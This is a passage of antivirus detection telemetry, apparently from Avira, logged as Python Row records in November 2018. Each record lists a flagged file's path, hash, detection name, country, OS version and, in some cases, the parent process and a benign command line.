  Row(detection=Row(filename='fscapturesetup84.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FSCaptureSetup84.exe', filesize=10588000, name='HEUR/AGEN.1017487.#M1.#R1'), hash='e74f5c53d3dca7e814fa2344f45e9ce46e13d15a821ac49f64d8901363f8aa6a', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:19:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111037-a560da97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdc3d38d\\AVSCAN-20181104-110901-9C74035A\\AVSCAN-20181104-111037-A560DA97', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00008cc5', filepath='C:\\Windows\\Temp\\c27db646-c3b1-476c-983e-74a922691aa7\\tmp000003cf\\tmp00008cc5', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='e6b2f1fdc0f7fef18276621a4332f2c3afd33a42fd520bfe55fd3e8438f3d95c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.930.11587\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T16:48:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-101712-d4185938', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4bd1c27a\\AVSCAN-20181104-094549-CD63F461\\AVSCAN-20181104-101712-D4185938', filesize=192000, name='TR/Black.Gen2.#M1.#R1'), hash='c15c2e2cd3be99c131bbb675597af96d818cc6331b201dd95f73f3dd7a0eba2c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:17:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wscript.exe', filepath='\\\\?\\C:\\WINXP\\system32\\wscript.exe', filesize=192000, name='W32/Jeefo.A.#M1.#R1'), hash='d54555f1012004327a4b511863c815878e9463bbaf7073626f8dae4b706a7f1f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:28:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='117682-renault-clio-3-gtasa.exe', filepath='C:\\Users\\X\\Desktop\\транспорт для GTA SA\\машины\\117682-renault-clio-3-gtasa.exe', filesize=15684000, name='PUA/GameModding.Gen.#M300.#R6944'), hash='e64700b002769bf2307dae4ac792df097cdc62c658a3416a0981d8fac43b2ab8', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T22:49:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205327-b757ce0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205327-B757CE0D', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292922', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292922', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:14:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='doofdoof.exe', filepath='C:\\Document and setting\\doofdoof.exe', filesize=384000, name='DR/Delphi.Gen.#M300.#R273'), hash='fe4029696947def84af9e7b0df0557224dd01413779c35c1cd51941193ffa789', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4473304, timestamp='2018-11-04T10:03:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-232341-f054119a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c397c4\\AVSCAN-20181104-232241-EA104D50\\AVSCAN-20181104-232341-F054119A', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:23:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline='\\\\\\/LOADSAVEDWINDOWS', country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T11:15:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:55:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:36:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ftx global vector configuration tool.exe', filepath='\\\\?\\E:\\Program Files (x86)\\Steam\\steamapps\\common\\FSX\\ORBX\\FTX_VECTOR\\FTX GLOBAL VECTOR Configuration Tool.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:37:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='daemontoolspro550-0388.exe', filepath='F:\\Delphi Neu\\Delphi 2014.3 FULL\\Delphi 2014.3 FULL\\DAEMONToolsPro550-0388.exe', filesize=19904000, name='W32/Sality.AT.#M1.#R1'), hash='f66a31e176ef3abc894ccde534753a48fe5ff4b75f094db7e9ae92163c6ee34d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T11:34:57Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-213658-4660903d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c7c86a7c\\AVSCAN-20181102-212445-0265EB6B\\AVSCAN-20181102-213658-4660903D', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='08a157a121fdd722237f4c2d98c1bf5f637716af11250de253bda58eb7d3e651', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:37:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='depo gabung juni 11.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM DEPOSITO\\2011\\NOM DEPO GABUNG JUNI 11\\DEPO GABUNG JUNI 11.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T02:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192037-451939df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54bc9577\\AVSCAN-20181102-191914-3B86E593\\AVSCAN-20181102-192037-451939DF', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:20:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C3BEDF1D1214363AC3582E2DF3F1E5E592BA8636E8480767D90BE1867AD6D1B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-17-42-00.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T16:47:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbscript.exe', filepath='c:\\program files (x86)\\otter32\\vbscript.exe', filesize=896000, name='HEUR/APC.#M1.#R1'), hash='5cae4d902e2d11f0980df6844ecb2606dd2fb0916bd5f744bddd933201d262de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=60416, timestamp='2018-11-02T21:04:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182343-e885acd8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24503679\\AVSCAN-20181102-182309-E396501A\\AVSCAN-20181102-182343-E885ACD8', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='3a2b98eedcc298b7f342be65af38c0d6fdf16716d5cc9158ff9bf77bfce92b5a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:23:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101050-aef7d11d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-101041-AD01BBC6\\AVSCAN-20181102-101050-AEF7D11D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092540-d936e9c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-092540-D936E9C1', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='39227ec741c01dff7028b6bb6747e6b5ce71f470b46ae34504d42db16f31fa70', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:27:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T11:12:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T17:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (5).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (5).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2973184, timestamp='2018-11-02T08:12:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DAA06240E33F2A887308725EB0E802E8524F8F970270DFC7C6F2A981FE638A6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:43:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161653-5aeebb0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-161538-52C9C851\\AVSCAN-20181102-161653-5AEEBB0C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0005954.exe', filepath='D:\\System Volume Information\\_restore{6B806EF6-C686-49F4-AC4B-5CBDA4B84782}\\RP14\\A0005954.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='2116a91ced1870a0445281a003c7b85885720efea80d4928b86f992cf7c5b724', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:45:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160000-ed437972', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160000-ED437972', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113448-dcef15e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-113333-CE1903DE\\AVSCAN-20181102-113448-DCEF15E6', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\Aivaras\\Desktop\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='D:\\Aivaras\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:38:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:f7byY\\\\\\/G42EOSw8wg.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T03:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\COMMON\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='26da584ca5ab584d801c79fd3d022992fcc724b7169097d2e6dabdac0880f111', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103559-9e1237d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_378b0c32\\AVSCAN-20181102-103514-965051F5\\AVSCAN-20181102-103559-9E1237D9', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:36:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:50:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:55Z'), dt=datetime.date(2018, 11, 2)),
